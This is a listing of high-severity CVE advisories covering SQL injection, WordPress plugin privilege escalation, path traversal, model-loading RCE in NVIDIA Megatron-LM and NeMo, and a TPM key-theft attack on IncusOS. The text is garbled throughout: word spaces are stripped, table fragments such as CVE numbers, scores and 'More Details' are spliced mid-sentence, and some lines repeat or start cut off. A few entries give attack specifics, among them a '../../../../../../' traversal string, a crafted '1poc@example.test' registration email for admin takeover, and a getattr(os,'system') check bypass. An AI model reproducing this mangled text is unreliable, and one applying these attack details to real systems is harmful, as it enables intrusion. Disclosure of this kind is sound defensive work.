Priortoversions7.15.1and8.9.3,whencreatingoreditingareport(AORReportsmodule),the`fieldfunctionCVE-parameterfromPOSTdataissaveddirectlyintotheaorfieldstablewithoutanyvalidation.Later,whenthe More2026-reportisexecuted/viewed,thisvalueisconcatenateddirectlyintoaSQLSELECTquerywithoutsanitization, 8.1 Details29096enablingsecond-orderSQLinjection.AnyauthenticateduserwithReportsaccesscanextractarbitrarydatabase contents(passwordhashes,APItokens,configvalues).OnMySQLwithFILEprivilege,thiscouldleadtoRCEvia SELECTINTOOUTFILE.Versions7.15.1and8.9.3patchtheissue. TheInvelityProductFeedspluginforWordPressisvulnerabletoarbitraryfiledeletionviapathtraversalinall CVE-versionsupto,andincluding,1.2.6.Thisisduetomissingvalidationandsanitizationinthe More2025-'createManageFeedPage'function.Thismakesitpossibleforauthenticatedadministrator-levelattackerstodelete 8.1 Details14037arbitraryfilesontheserverviaspeciallycraftedrequeststhatincludepathtraversalsequences,grantedtheycan trickanadminintoclickingamaliciouslink. Glancesisanopen-sourcesystemcross-platformmonitoringtool.Priortoversion4.5.2,theGlancesRESTAPIweb servershipswithadefaultCORSconfigurationthatsetsalloworigins=[""]combinedwithallow_credentials=True.Whenbothoftheseoptionsareenabledtogether,Starlette'sCORSMiddlewareCVE-reflectstherequestingOriginheadervalueintheAccess-Control-Allow-Originresponseheaderinsteadof More2026- 8.1returningtheliteral`wildcard.Thiseffectivelygrantsanywebsitetheabilitytomakecredentialedcross-origin Details32610APIrequeststotheGlancesserver,enablingcross-sitedatatheftofsystemmonitoringinformation,configuration secrets,andcommandlineargumentsfromanyuserwhohasanactivebrowsersessionwithaGlancesinstance.
TheImportandexportusersandcustomerspluginforWordPressisvulnerabletoprivilegeescalationinall versionsupto,andincluding,1.29.7.Thisisduetothe'saveextrauserprofilefields'functionnotproperly CVE-restrictingwhichusermetakeyscanbeupdatedviaprofilefields.The'getrestrictedfields'methoddoesnot More2026-includesensitivemetakeyssuchas'wpcapabilities'.Thismakesitpossibleforunauthenticatedattackersto 8.1 Details3629escalatetheirprivilegestoAdministratorbysubmittingacraftedregistrationrequestthatsetsthe 'wpcapabilities'metakey.Thevulnerabilitycanonlybeexploitedifthe"Showfieldsinprofile"settingisenabled andaCSVwithawpcapabilitiescolumnheaderhasbeenpreviouslyimported. TheContestGallerypluginforWordPressisvulnerabletoanauthenticationbypassleadingtoadminaccount takeoverinallversionsupto,andincluding,28.1.5.Thisisduetotheemailconfirmationhandlerinusers- registry-check-after-email-or-pin-confirmation.phpusingtheuser'semailstringinaWHEREID=%sclause CVE-insteadofthenumericuserID,combinedwithanunauthenticatedkey-basedloginendpointinajax-functions- More2026-frontend.php.Whenthenon-defaultRegMailOptional=1settingisenabled,anattackercanregisterwitha 8.1 Details4021craftedemailstartingwiththetargetuserID(e.g.,1poc@example.test),triggertheconfirmationflowto overwritetheadmin's`useractivationkeyviaMySQLintegercoercion,andthenusethepostcg1lloginuserbykeyAJAXactiontoauthenticateastheadminwithoutanycredentials.Thismakesit possibleforunauthenticatedattackerstotakeoveranyWordPressadministratoraccountandgainfullsitecontrol. HTSlibisalibraryforreadingandwritingbioinformaticsfileformats.GZIfilesareusedtoindexblock-compressed GZIP[BGZF]files.IntheGZIloadingfunction,bgzfindexload_hfile(),itwaspossibletotriggeraninteger overflow,leadingtoanunder-orzero-sizedbufferbeingallocatedtostoretheindex.Sixteenzerobyteswould thenbewrittentothisbuffer,and,dependingontheresultoftheoverflowtherestofthefilemayalsobeloaded CVE-intothebufferaswell.Ifthefunctiondidattempttoloadthedata,itwouldeventuallyfailduetonotreadingthe More 2026- 8.1expectednumberofrecords,andthentrytofreetheoverflowedheapbuffer.Exploitingthisbugcausesaheap Details 31970bufferoverflow.Ifauseropensafilecraftedtoexploitthisissue,itcouldleadtotheprogramcrashing,or overwritingofdataandheapstructuresinwaysnotexpectedbytheprogram.Itmaybepossibletousethisto obtainarbitrarycodeexecution.Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Theeasiestwork- aroundistodiscardany.gziindexfilesfromuntrustedsources,andusethebgzip-r`optiontorecreatethem.
OneUptimeisasolutionformonitoringandmanagingonlineservices.Priortoversion10.0.34,thefixforCVE- 2026-32306(ClickHouseSQLinjectionviaaggregatequeryparameters)addedcolumnnamevalidationtothe 2026-32306(ClickHouseSQLinjectionviaaggregatequeryparameters)addedcolumnnamevalidationtothe aggregateBymethodbutdidnotapplythesamevalidationtothreeotherqueryconstructionpathsinCVE- MoreStatementGenerator.ThetoSortStatement,toSelectStatement,andtoGroupByStatementmethodsacceptuser- 8.1 DetailscontrolledobjectkeysfromAPIrequestbodiesandinterpolatethemasClickHouseIdentifierparameterswithout33142 verifyingtheycorrespondtoactualmodelcolumns.ClickHouseIdentifierparametersaresubstituteddirectlyinto querieswithoutescaping,soanattackerwhocanreachanyanalyticslistoraggregateendpointcaninject arbitrarySQLthroughcraftedsort,select,orgroupBykeys.Thisissuehasbeenpatchedinversion10.0.34. CVE-LibreChatversion0.8.1-rc2usesthesameJWTsecretfortheusersessionmechanismandRAGAPIwhich More2025- 8.0compromisestheservice-levelauthenticationoftheRAGAPI. Details41258 Admidioisanopen-sourceusermanagementsolution.Versions5.0.6andbelowarevulnerabletoarbitrarySQL InjectionthroughtheMyListconfigurationfeature.TheMyListconfigurationfeatureletsauthenticatedusersdefine customlistcolumnlayouts,storinguser-suppliedcolumnnames,sortdirections,andfilterconditionsintheCVE-admlistcolumnstableviapreparedstatements.However,thesestoredvaluesarelaterreadbackand More2026- 8.0interpolateddirectlyintodynamicallyconstructedSQLquerieswithoutsanitizationorparameterization,creatinga Details32813classicsecond-orderSQLinjectionvulnerability(safewrite,unsaferead).Anattackercanexploitthistoinject arbitrarySQL,potentiallyreading,modifying,ordeletinganydatainthedatabaseandachievingfulldatabase compromise.Thisissuehasbeenfixedinversion5.0.7. OpenClawversionspriorto2026.2.26containametadataspoofingvulnerabilitywherereconnectplatformandCVE-deviceFamilyfieldsareacceptedfromtheclientwithoutbeingboundintothedevice-authsignature.Anattacker More2026- 8.0withapairednodeidentityonthetrustednetworkcanspoofreconnectmetadatatobypassplatform-basednode Details32014commandpoliciesandgainaccesstorestrictedcommands. MuraCMSthrough10.1.10containsaCSRFvulnerabilityintheAddToGroupfunctionalityforusermanagement (cUsers.cfcaddToGroupmethod)thatallowsattackerstoescalateprivilegesbyaddinganyusertoanygroup withoutproperauthorizationchecks.ThevulnerablefunctionlacksCSRFtokenvalidationanddirectlyprocessesCVE-user-supplieduserIdandgroupIdparametersviagetUserManager().createUserInGorup(),enablingmalicious More2025- 8.0websitestoforgerequeststhatautomaticallyexecutewhenanauthenticatedadministratorvisitsacraftedpage. Details55041AddingausertotheSuperAdminsgroup(s2user)isnotpossible.Successfulexploitationresultsintheattacker gainingprivilegeescalationbothhorizontallytoothergroupsandverticallytotheadmingroup.Escalationtothe s2Usergroupisnotpossible. CVE-The"PrivilegedHelper"componentoftheArturiaSoftwareCenter(MacOS)doesnotperformsufficientclientcode More2026-signaturevalidationwhenaclientconnects.Thisleadstoanattackerbeingabletoconnecttothehelperand 7.8 Details24062executeprivilegedactionsleadingtolocalprivilegeescalation. CVE- More2025-AWStats8.0isvulnerabletoCommandInjectionviatheopenfunction 7.8 Details63261 CVE-NVIDIAModelOptimizerforWindowsandLinuxcontainsavulnerabilityintheONNXquantizationfeature,wherea More2026-usercouldcauseunsafedeserializationbyprovidingaspeciallycraftedinputfile.Asuccessfulexploitofthis 7.8 Details24141vulnerabilitymightleadtocodeexecution,escalationofprivileges,datatampering,andinformationdisclosure. NGINXOpenSourceandNGINXPlushaveavulnerabilityinthengxhttpmp4modulemodule,whichmightallow anattackertotriggerabufferover-readorover-writetotheNGINXworkermemoryresultinginitsterminationor CVE-possiblycodeexecution,usingaspeciallycraftedMP4file.ThisissueaffectsNGINXOpenSourceandNGINXPlus More2026-ifitisbuiltwiththengxhttpmp4modulemoduleandthemp4directiveisusedintheconfigurationfile. 7.8 Details32647Additionally,theattackispossibleonlyifanattackercantriggertheprocessingofaspeciallycraftedMP4filewith thengxhttpmp4modulemodule.Note:SoftwareversionswhichhavereachedEndofTechnicalSupport(EoTS) arenotevaluated. CVE-NVIDIAMegatron-LMcontainsavulnerabilityinthehybridconversionscriptwhereanAttackermaycauseanRCE More2025-byconvincingausertoloadamaliciouslycraftedfile.Asuccessfulexploitofthisvulnerabilitymayleadtocode 7.8 Details33248execution,escalationofprivileges,informationdisclosure,anddatatampering. CVE-NVIDIAMegatron-LMcontainsavulnerabilityininferencingwhereanAttackermaycauseanRCEbyconvincinga More2026-usertoloadamaliciouslycraftedinput.Asuccessfulexploitofthisvulnerabilitymayleadtocodeexecution, 7.8 Details24151escalationofprivileges,informationdisclosure,anddatatampering. CVE-NVIDIAMegatron-LMcontainsavulnerabilityincheckpointloadingwhereanAttackermaycauseanRCEby More2026-convincingausertoloadamaliciouslycraftedfile.Asuccessfulexploitofthisvulnerabilitymayleadtocode 7.8 Details24152execution,escalationofprivileges,informationdisclosure,anddatatampering. CVE-NVIDIANeMoFrameworkcontainsavulnerabilityincheckpointloadingwhereanattackercouldcauseremote More2026-codeexecution.Asuccessfulexploitofthisvulnerabilitymightleadtocodeexecution,escalationofprivileges, 7.8 Details24157informationdisclosureanddatatampering. CVE-ImproperRestrictionofOperationswithintheBoundsofaMemoryBuffervulnerabilityinlinkingvision More 7.8rapidvms.Thisissueaffectsrapidvms:beforePR#96. Details33847 TheIntelEPTpagingcodeusesanoptimizationtodeferflushingofanycachedEPTstateuntilthep2mlockis
CVE- dropped,sothatmultiplemodificationsdoneunderthesamelockedregiononlyissueasingleflush.Freeingof More pagingstructureshoweverisnotdeferreduntiltheflushingisdone,andcanresultinfreedpagestransiently 7.8 Details23554 beingpresentincachedstate.Suchstaleentriescanpointtomemoryrangesnotownedbytheguest,thus allowingaccesstounintendedmemoryregions. CVE- More2026- Out-of-boundsWritevulnerabilityinWujekFoliarzDualSenseY-v2.ThisissueaffectsDualSenseY-v2:before54. 7.8 Details33850 CVE- NVIDIANeMoFrameworkcontainsavulnerabilitywhereanattackermaycauseremotecodeexecution.A More2026- successfulexploitofthisvulnerabilitymightleadtocodeexecution,escalationofprivileges,information 7.8 Details24159 disclosureanddatatampering. CVE- ImproperRestrictionofOperationswithintheBoundsofaMemoryBuffervulnerabilityinjoncampbell123 More2026- 7.8 doslib.Thisissueaffectsdoslib:beforedoslib-20250729. Details33851 The32-bitimplementationofNGINXOpenSourcehasavulnerabilityinthengxhttpmp4modulemodule,which mightallowanattackertoover-readorover-writeNGINXworkermemoryresultinginitstermination,usinga CVE- speciallycraftedMP4file.Theissueonlyaffects32-bitNGINXOpenSourceifitisbuiltwiththe More2026- ngxhttpmp4modulemoduleandthemp4directiveisusedintheconfigurationfile.Additionally,theattackis 7.8 Details27784 possibleonlyifanattackercantriggertheprocessingofaspeciallycraftedMP4filewiththe ngxhttpmp4modulemodule.Note:SoftwareversionswhichhavereachedEndofTechnicalSupport(EoTS)are notevaluated. CVE- NVIDIAMegatron-LMcontainsavulnerabilityincheckpointloadingwhereanAttackermaycauseanRCEby More2026- convincingausertoloadamaliciouslycraftedfile.Asuccessfulexploitofthisvulnerabilitymayleadtocode 7.8 Details24150 execution,escalationofprivileges,informationdisclosure,anddatatampering. CVE- Out-of-boundsWritevulnerabilityinMolotovCherryAndroid-ImageMagick7.ThisissueaffectsAndroid- More2026- 7.8 ImageMagick7:before7.1.2-11. Details4756 llama.cppisaninferenceofseveralLLMmodelsinC/C++.Priortob7824,anintegeroverflowvulnerabilityinthe `ggmlnbytesfunctionallowsanattackertobypassmemoryvalidationbycraftingaGGUFfilewithspecificCVE- tensordimensions.Thiscausesggmlnbytes`toreturnasignificantlysmallersizethanrequired(e.g.,4MB More2026- 7.8 insteadofExabytes),leadingtoaheap-basedbufferoverflowwhentheapplicationsubsequentlyprocessesthe Details33298 tensor.ThisvulnerabilityallowspotentialRemoteCodeExecution(RCE)viamemorycorruption.b7824containsa fix. OpenWrtProjectisaLinuxoperatingsystemtargetingembeddeddevices.Inversionspriorto24.10.6,a vulnerabilityinthehotplugcallfunctionallowsanattackertobypassenvironmentvariablefilteringandinjectan arbitraryPATHvariable,potentiallyleadingtoprivilegeescalation.ThefunctionisintendedtofilteroutsensitiveCVE- environmentvariableslikePATHwhenexecutinghotplugscriptsin/etc/hotplug.d,butabugusingstrcmpinstead More2026- 7.8 ofstrncmpcausesthefiltertocomparethefullenvironmentstring(e.g.,PATH=/some/value)againsttheliteral Details30874 "PATH",sothematchalwaysfails.Asaresult,thePATHvariableisneverexcluded,enablinganattackertocontrol whichbinariesareexecutedbyprocd-invokedscriptsrunningwithelevatedprivileges.Thisissuehasbeenfixedin version24.10.6. pydicomisapurePythonpackageforworkingwithDICOMfiles.Versions2.0.0-rc.1through3.0.1arevulnerable toPathTraversalthroughamaliciouslycraftedDICOMDIRReferencedFileIDwhenitissettoapathoutsidetheCVE- File-setroot.pydicomresolvesthepathonlytoconfirmthatitexists,butdoesnotverifythattheresolvedpath More2026- 7.8 remainsundertheFile-setroot.SubsequentpublicFileSetoperationssuchascopy(),write(),and Details32711 remove()+write(useexisting=True)usethatuncheckedpathinfileI/Ooperations.Thisallowsarbitraryfile read/copyand,insomeflows,move/deleteoutsidetheFile-setroot.Thisissuehasbeenfixedinversion3.0.2. libfuseisthereferenceimplementationoftheLinuxFUSE.Fromversion3.18.0tobeforeversion3.18.2,ause- after-freevulnerabilityintheiouringsubsystemoflibfuseallowsalocalattackertocrashFUSEfilesystem CVE- processesandpotentiallyexecutearbitrarycode.Wheniouringthreadcreationfailsduetoresourceexhaustion More2026- (e.g.,cgrouppids.max),fuseuring_start()freestheringpoolstructurebutstoresthedanglingpointerinthe 7.8 Details33150 sessionstate,leadingtoause-after-freewhenthesessionshutsdown.Thetriggerisreliableincontainerized environmentswherecgrouppids.maxlimitsnaturallyconstrainthreadcreation.Thisissuehasbeenpatchedin version3.18.2. RequiresmalwarecodetomisusetheDDKkernelmoduleIOCTLinterface.SuchcodecanusetheinterfaceinanCVE- unsupportedwaythatallowssubversionoftheGPUtoperformwritestoarbitraryphysicalmemorypages.The More2026- 7.8 productutilisesasharedresourceinaconcurrentmannerbutdoesnotattempttosynchroniseaccesstothe Details22163 resource. ScreenToGifisascreenrecordingtool.Inversionsfrom2.42.1andprior,ScreenToGifisvulnerabletoDLL CVE- sideloadingviaversion.dll.Whentheportableexecutableisrunfromauser-writabledirectory,itloadsversion.dll More fromtheapplicationdirectoryinsteadoftheWindowsSystem32directory,allowingarbitrarycodeexecutioninthe 7.8 Details33156 user'scontext.ThisisespeciallyimpactfulbecauseScreenToGifisprimarilydistributedasaportableapplication intendedtoberunfromuser-writablelocations.Attimeofpublication,therearenopubliclyavailablepatches.
PySpectorisastaticanalysissecuritytesting(SAST)FrameworkengineeredformodernPythondevelopment workflows.PySpectorversions0.1.6andpriorareaffectedbyasecurityvalidationbypassinthepluginsystem. Thevalidateplugincode()functioninpluginsystem.py,performsstaticASTanalysistoblockdangerousAPIcallsCVE-beforeapluginistrustedandexecuted.However,theinternalresolvename()helperonlyhandlesast.Nameand More 7.8ast.Attributenodetypes,returningNoneforallothers.Whenapluginusesindirectfunctioncallsviagetattr() Details33139(suchasgetattr(os,'system'))theoutercall'sfuncnodeisoftypeast.Call,causingresolvename()toreturnNone, andthesecuritychecktobesilentlyskipped.Thepluginincorrectlypassesthetrustworkflow,andexecutes arbitrarysystemcommandsontheuser'smachinewhenloaded.Thisissuehasbeenpatchedinversion0.1.7. Aflawwasfoundinthelibtifflibrary.AremoteattackercouldexploitasignedintegeroverflowvulnerabilityintheCVE-putcontig8bitYCbCr44tilefunctionbyprovidingaspeciallycraftedTIFFfile.Thisflawcanleadtoanout-of-bounds More2026- 7.8heapwriteduetoincorrectmemorypointercalculations,potentiallycausingadenialofservice(applicationcrash) Details4775orarbitrarycodeexecution. AdminExpress1.2.5.485containsalocalstructuredexceptionhandlingbufferoverflowvulnerabilitythatallows CVE-localattackerstoexecutearbitrarycodebysupplyinganalphanumericencodedpayloadintheFolderPathfield. More2019-AttackerscantriggerthevulnerabilitythroughtheSystemComparefeaturebypastingacraftedbufferoverflow 7.8 Details25612payloadintotheleft-handsideFolderPathfieldandclickingthescaleicontoexecuteshellcodewithapplication privileges. CVE-NVIDIAMegatronLMcontainsavulnerabilityinquantizationconfigurationloading,whichcouldallowremotecode More2025-execution.Asuccessfulexploitofthisvulnerabilitymightleadtocodeexecution,escalationofprivileges, 7.8 Details33247informationdisclosure,anddatatampering. OpenClawversionspriorto2026.2.21sandboxbrowserentrypointlaunchesx11vncwithoutauthenticationforCVE-noVNCobserversessions,allowingunauthenticatedaccesstotheVNCinterface.Remoteattackersonthehost More2026- 7.7loopbackinterfacecanconnecttotheexposednoVNCporttoobserveorinteractwiththesandboxbrowser Details32064withoutcredentials. CVE-AnAuthenticatedNoSQLInjectionvulnerabilityfoundinUniFiNetworkApplicationcouldallowamaliciousactor More2026- 7.7withauthenticatedaccesstothenetworktoescalateprivileges. Details22558 CVE-Undercertainconditions,anattackercouldbindtothesameportusedbyWebCTRL.Thiscouldallowtheattacker More2026-tocraftandsendmaliciouspacketsandimpersonatetheWebCTRLservicewithoutrequiringcodeinjectioninto 7.7 Details25086theWebCTRLsoftware. AflawwasfoundinKeycloak.Keycloak'sSecurityAssertionMarkupLanguage(SAML)brokerendpointdoesnotCVE-properlyvalidateencryptedassertionswhentheoverallSAMLresponseisnotsigned.Anattackerwithavalid More2026- 7.7signedSAMLassertioncanexploitthisbycraftingamaliciousSAMLresponse.Thisallowstheattackertoinjectan Details2092encryptedassertionforanarbitraryprincipal,leadingtounauthorizedaccessandpotentialinformationdisclosure. Cockpitisaheadlesscontentmanagementsystem.AnyCockpitCMSinstancerunningversion2.13.4orearlier withAPIaccessenabledispotentiallyaffectedbyaaSQLInjectionvulnerabilityintheMongoLiteAggregation Optimizer.Anydeploymentwherethe/api/content/aggregate/{model}endpointispubliclyaccessibleor reachablebyuntrustedusersmaybevulnerable,andattackersinpossessionofavalidread-onlyAPIkey(theCVE-lowestprivilegelevel)canexploitthisvulnerability—noadminaccessisrequired.Anattackercaninjectarbitrary More2026- 7.7SQLviaunsanitizedfieldnamesinaggregationqueries,bypassthe`state=1published-contentfiltertoaccess Details31891unpublishedorrestrictedcontent,andextractunauthorizeddatafromtheunderlyingSQLitecontentdatabase. Thisvulnerabilityhasbeenpatchedinversion2.13.5.Thefixappliesthesamefield-namesanitizationintroduced inv2.13.3fortoJsonPath()tothetoJsonExtractRaw()methodinlib/MongoLite/Aggregation/Optimizer.php, closingtheinjectionvectorintheAggregationOptimizer. Wallosisanopen-source,self-hostablepersonalsubscriptiontracker.Priortoversion4.7.0,theSSRFfixappliedin version4.6.2forCVE-2026-30839andCVE-2026-30840isincomplete.Thevalidate_webhook_url_for_ssrf()CVE-protectionwasaddedtothetest*notificationendpointsbutnottothecorrespondingsave*endpoints.An More2026- 7.7authenticatedusercansaveaninternal/privateIPaddressasanotificationURL,andwhenthecronjob Details33399sendnotifications.phpexecutes,therequestissenttotheinternalIPwithoutanySSRFvalidation.Thisissuehas beenpatchedinversion4.7.0. CVE-AStoredcross-sitescripting(XSS)vulnerabilityaffectsHCLUnicaMarketingOperationsv12.1.8andlower.Stored More2024-cross-sitescripting(alsoknownassecond-orderorpersistentXSS)ariseswhenanapplicationreceivesdatafrom 7.6 Details42210anuntrustedsourceandincludesthatdatawithinitslaterHTTPresponsesinanunsafeway. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,POST /objects/aVideoEncoder.json.phpacceptsarequester-controlledchunkFileparameterintendedforstaged uploadchunks.Insteadofrestrictingthatpathtotrustedserver-generatedchunklocations,theendpointaccepts CVE-arbitrarylocalfilesystempathsthatpassisValidURLOrPath().Thathelperallowsfilesunderbroadserver More2026- 7.6directoriesincluding/var/www/,theapplicationroot,cache,tmp,andvideos,onlyrejecting.php`files.Foran Details33354authenticateduploadereditingtheirownvideo,thisbecomesanarbitrarylocalfileread.Theendpointcopiesthe attacker-chosenlocalfileintotheattacker'spublicvideostoragepath,afterwhichitcanbedownloadedover HTTP.Commit59bbd601a3f65a5b18c1d9e4eb11471c0a59214fcontainsapatchfortheissue. Cryptomatorencryptsdatabeingstoredoncloudinfrastructure.Priortoversion1.19.1,anintegritycheck vulnerabilityallowsanattackertotamperwiththevaultconfigurationfileleadingtoaman-in-the-middle vulnerabilityallowsanattackertotamperwiththevaultconfigurationfileleadingtoaman-in-the-middle CVE-vulnerabilityinHubkeyloadingmechanism.Beforethisfix,theclienttrustedendpointsfromthevaultconfig Morewithouthostauthenticitychecks,whichcouldallowtokenexfiltrationbymixingalegitimateauthendpointwitha 7.6 Details32303maliciousAPIendpoint.ImpactedareusersunlockingHub-backedvaultswithaffectedclientversionsin environmentswhereanattackercanalterthevault.cryptomatorfile.Thisissuehasbeenpatchedinversion 1.19.1. CVE-AnauthorizationbypassvulnerabilityintheVaultsecretsback-endimplementationofJujuversions3.1.6through More2026-3.6.18allowsanauthenticatedunitagenttoperformunauthorizedupdatestosecretrevisions.Withsufficient 7.6 Details32692information,anattackercanpoisonanyexistingsecretrevisionwithinthescopeofthatVaultsecretback-end.
CVE- to8.0.0.2,userswiththeNotes-myencountersrolecanfillEyeExamformsinpatientencounters.Theanswers More2026- totheformcanbeprintedoutinPDFform.AnOut-of-BandServer-SideRequestForgery(OOBSSRF)vulnerability 7.6 Details33321 wasidentifiedinthePDFcreationfunctionwheretheformanswersareparsedasunescapedHTML,allowingan attackertoforgerequestsfromtheservermadetoexternalorinternalresources.Version8.0.0.2fixestheissue. IncusOSisanimmutableOSimagededicatedtorunningIncus.Priorto202603142010,thedefaultconfiguration ofsystemd-cryptenrollasusedbyIncusOSthroughmkosiallowsforanattackerwithphysicalaccesstothe machinetoaccesstheencrypteddatawithoutrequiringanyinteractionbythesystem'sowneroranytampering ofSecureBootstateorkernel(UKI)bootimage.That'sbecauseinthisconfiguration,theLUKSkeyismade availablebytheTPMsolongasthesystemhastheexpectedPCR7valueandthePCR11policymatches.That defaultPCR11policyimportantlyallowsfortheTPMtoreleasethekeytothebootedsystemratherthanjustfrom theinitrdpartofthesignedkernelimage(UKI).Theattackreliesontheattackerbeingabletosubstitutethe originalencryptedrootpartitionforonethattheycontrol.Bydoingso,thesystemwillpromptforarecoverykey onboot,whichtheattackerhasdefinedandcanprovide,beforebootingthesystemusingtheattacker'sroot partitionratherthanthesystem'soriginalone.Theattackeronlyneedstoputasystemdunitstartingonsystem bootwithintheirrootpartitiontohavethesystemrunthatlogiconboot.Thatunitwillthenruninanenvironment CVE- wheretheTPMwillallowfortheretrievaloftheencryptionkeyoftherealrootdisk,allowingtheattackertosteal More2026- theLUKSvolumekey(immutablemasterkey)andthenuseitagainsttherealrootdisk,alteringitorgettingdata 7.6 Details32606 outbeforeputtingthediskbackthewayitwasandreturningthesystemwithoutatraceofthisattackhaving happened.ThisisallpossiblebecausethesystemwillhavestillbootedwithSecureBootenabled,willhave measuredandrantheexpectedbootloaderandkernelimage(UKI).TheinitrdselectstherootdiskbasedonGPT partitionidentifiersmakingitpossibletoeasilysubstitutetherealrootdiskforanattackercontrolledone.This doesn'tleadtoanychangeintheTPMstateandthereforeallowsforretrievaloftheLUKSkeybytheattacker throughaboottimesystemdunitontheiralternativerootpartition.IncusOSversion202603142010(2026/03/14 20:10UTC)includesthenewPCR15logicandwillautomaticallyupdatetheTPMpolicyonboot.Anyonesuspecting thattheirsystemmayhavebeenphysicallyaccessedwhileshutdownshouldperformafullsystemwipeand reinstallationasonlythatwillrotatetheLUKSvolumekeyandpreventsubsequentaccesstotheencrypteddata shouldthesystemhavebeenpreviouslycompromised.Therearenoknownworkaroundsotherthanupdatingtoa versionwithcorrectedlogicwhichwillautomaticallyrebindtheLUKSkeystothenewsetofTPMregistersand preventthisfrombeingexploited. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,auserwiththe"Videos Moderator"permissioncanescalateprivilegestoperformfullvideomanagementoperations—including CVE- ownershiptransferanddeletionofanyvideo—despitethepermissionbeingdocumentedasonlyallowingvideo More2026- publicitychanges(Active,Inactive,Unlisted).TherootcauseisthatPermissions::canModerateVideos()isused 7.6 Details33650 asanauthorizationgateforfullvideoeditinginvideoAddNew.json.php,whilevideoDelete.json.phponly checksownership,creatinganasymmetricauthorizationboundaryexploitableviaatwo-stepownership-transfer- then-deletechain.Commit838e16818c793779406ecbf34ebaeba9830e33f8containsapatch. CryptomatorforAndroidoffersmulti-platformtransparentclient-sideencryptionforfilesinthecloud.Priorto version1.12.3,anintegritycheckvulnerabilityallowsanattackertamperwiththevaultconfigurationfileleading CVE- toaman-in-the-middlevulnerabilityinHubkeyloadingmechanism.Beforethisfix,theclienttrustedendpoints More2026- fromthevaultconfigwithouthostauthenticitychecks,whichcouldallowtokenexfiltrationbymixingalegitimate 7.6 Details32317 authendpointwithamaliciousAPIendpoint.ImpactedareusersunlockingHub-backedvaultswithaffectedclient versionsinenvironmentswhereanattackercanalterthevault.cryptomatorfile.Thisissuehasbeenpatchedin version1.12.3.
9.6.0-alpha.15and8.6.41,anattackerwhoisallowedtouploadfilescanbypassthefileextensionfilterby appendingaMIMEparameter(e.g.;charset=utf-8)totheContent-Typeheader.Thiscausestheextension validationtofailmatchingagainsttheblocklist,allowingactivecontenttobestoredandservedunderthe application'sdomain.Inaddition,certainXML-basedfileextensionsthatcanrenderscriptsinwebbrowsersare notincludedinthedefaultblocklist.ThiscanleadtostoredXSSattacks,compromisingsessiontokens,user credentials,orothersensitivedataaccessibleviathebrowser'slocalstorage.Thefixinversions9.6.0-alpha.15 and8.6.41stripsMIMEparametersfromtheContent-TypeheaderbeforevalidatingthefileextensionagainstCVE- Moretheblocklist.ThedefaultblocklisthasalsobeenextendedtoincludeadditionalXML-basedextensions(xsd,2026- 7.6 Detailsrng,rdf,rdf+xml,owl,mathml,mathml+xml)thatcanrenderactivecontentinwebbrowsers.Note32728 thatthefileUpload.fileExtensionsoptionisintendedtobeconfiguredasanallowlistoffileextensionsthatare validforaspecificapplication,notasadenylist.Thedefaultdenylistisprovidedonlyasabasicdefaultthat coversmostcommonproblematicextensions.Itisnotintendedtobeanexhaustivelistofallpotentially dangerousextensions.Developersshouldnotrelyonthedefaultvalue,asnewextensionsthatcanrenderactive contentinbrowsersmightemergeinthefuture.Asaworkaround,configurethefileUpload.fileExtensionsoption contentinbrowsersmightemergeinthefuture.Asaworkaround,configurethefileUpload.fileExtensionsoption touseanallowlistofonlythefileextensionsthatyourapplicationneeds,ratherthanrelyingonthedefault blocklist. SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,POST/api/import/importSYand POST/api/import/importZipMdwriteuploadedarchivestoapathderivedfromthemultipartfilenamefieldwithoutCVE-sanitization,allowinganadmintowritefilestoarbitrarylocationsoutsidethetempdirectory-includingsystem More2026- 7.6pathsthatenableRCE.Thiscanleadtoaatadestructionbyoverwritingworkspaceorapplicationfiles,andfor Details32749Dockercontainersrunningasroot(commondefault),thisgrantsfullcontainercompromise.Thisissuehasbeen fixedinversion3.6.1. CryptomatorforIOSoffersmulti-platformtransparentclient-sideencryptionforfilesinthecloud.Priortoversion 2.8.3,anintegritycheckvulnerabilityallowsanattackertamperwiththevaultconfigurationfileleadingtoaman- CVE-in-the-middlevulnerabilityinHubkeyloadingmechanism.Beforethisfix,theclienttrustedendpointsfromthe More2026-vaultconfigwithouthostauthenticitychecks,whichcouldallowtokenexfiltrationbymixingalegitimateauth 7.6 Details32318endpointwithamaliciousAPIendpoint.ImpactedareusersunlockingHub-backedvaultswithaffectedclient versionsinenvironmentswhereanattackercanalterthevault.cryptomatorfile.Thisissuehasbeenpatchedin version2.8.3. OpenClawversionspriorto2026.2.26containapathtraversalvulnerabilityinworkspaceboundaryvalidationthatCVE-allowsattackerstowritefilesoutsidetheworkspacethroughin-workspacesymlinkspointingtonon-existentout- More2026- 7.6of-roottargets.Thevulnerabilityexistsbecausetheboundarycheckimproperlyresolvesaliases,permittingthe Details32055firstwriteoperationtoescapetheworkspaceboundaryandcreatefilesinarbitrarylocations. CVE-LyricVideoCreator2.1containsadenialofservicevulnerabilitythatallowsattackerstocrashtheapplicationby More2019-processingmalformedMP3files.AttackerscancreateacraftedMP3filewithanoversizedbufferandtriggerthe 7.5 Details25560crashbyopeningthefilethroughtheBrowsesongfunctionality. WebCTRLsystemsthatcommunicateoverBACnetinherittheprotocol'slackofnetworklayerauthentication.CVE-WebCTRLdoesnotimplementadditionalvalidationofBACnettrafficsoanattackerwithnetworkaccesscould More2026- 7.5spoofBACnetpacketsdirectedateithertheWebCTRLserverorassociatedAutomatedLogiccontrollers.Spoofed Details32666packetsmaybeprocessedaslegitimate. TheJetFormBuilderpluginforWordPressisvulnerabletoarbitraryfilereadviapathtraversalinallversionsupto, andincluding,3.5.6.2.Thisisduetothe'UploadedFile::setfromarray'methodacceptinguser-suppliedfilepaths CVE-fromtheMediaFieldpresetJSONpayloadwithoutvalidatingthatthepathbelongstotheWordPressuploads More2026-directory.Combinedwithaninsufficientsame-filecheckin'FileTools::issamefile'thatonlycompares 7.5 Details4373basenames,thismakesitpossibleforunauthenticatedattackerstoexfiltratearbitrarylocalfilesasemail attachmentsbysubmittingacraftedformrequestwhentheformisconfiguredwithaMediaFieldandaSend Emailactionwithfileattachment. phpTransformer2016.9containsadirectorytraversalvulnerabilitythatallowsunauthenticatedattackerstoCVE-accessarbitraryfilesbymanipulatingthepathparameter.Attackerscansendrequeststothe More2019- 7.5jQueryFileUploadmasterserverendpointwithtraversalsequences../../../../../../tolistandretrievefilesoutsidethe Details25579intendeddirectory. 